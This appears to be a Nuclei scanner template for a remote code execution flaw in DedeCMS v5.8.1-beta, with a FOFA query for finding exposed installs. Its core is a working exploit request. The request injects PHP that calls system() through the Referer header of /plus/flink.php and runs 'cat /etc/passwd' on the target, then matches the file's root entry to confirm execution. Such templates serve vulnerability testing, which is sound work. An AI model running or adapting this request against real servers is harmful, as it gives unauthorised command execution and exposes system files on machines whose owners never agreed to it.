33 lines
987 B
YAML
33 lines
987 B
YAML
id: dedecms-rce
|
|
|
|
info:
|
|
name: DedeCMS v5.8.1-beta - Remote Code Execution
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
The vulnerability is due to a variable override vulnerability in DedeCMS that allows an attacker to construct malicious code with template file inclusion without authorization to cause remote command execution attacks and ultimately gain the highest privileges on the server.
|
|
reference:
|
|
- https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
|
|
- https://sectime.top/post/1d114771.html
|
|
metadata:
|
|
verified: true
|
|
fofa-query: app="DedeCMS"
|
|
tags: dedecms,cms,rce
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: <?php "system"($c);die;/*ref
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|